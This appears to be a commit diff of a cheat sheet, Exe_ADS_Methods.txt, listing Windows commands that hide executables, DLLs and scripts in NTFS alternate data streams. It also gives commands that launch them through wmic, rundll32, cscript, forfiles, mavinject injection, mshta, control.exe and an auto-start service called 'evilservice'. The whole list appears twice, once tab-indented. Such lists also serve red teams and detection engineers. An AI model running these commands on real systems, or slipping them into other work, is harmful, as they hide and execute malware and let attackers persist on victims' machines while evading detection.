wflk · January 16, 2020 06:43
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
 #Add content to ADS
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 
 #Executing the ADS content

 * WMIC
 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

 * Rundll32
 rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain

 * Cscript
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

 * Forfiles
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"

 * Mavinject.exe
 c:\windows\SysWOW64\notepad.exe
 tasklist | findstr notepad
 notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
 type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
 c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

 * MSHTA
 mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

 * Control.exe
 control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
 https://twitter.com/bohops/status/954466315913310209

 * Create service and run
 sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
 sc start evilservice
	#Add content to ADS
	type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
	extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
	findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

	#Executing the ADS content

	* WMIC
	wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

	* Rundll32
	rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain

	* Cscript
	cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

	* Forfiles
	forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"

	* Mavinject.exe
	c:\windows\SysWOW64\notepad.exe
	tasklist \| findstr notepad
	notepad.exe 4172 31C5CE94259D4006 2 18,476 K
	type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
	c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

	* MSHTA
	mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

	* Control.exe
	control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
	https://twitter.com/bohops/status/954466315913310209

	* Create service and run
	sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
	sc start evilservice
No results found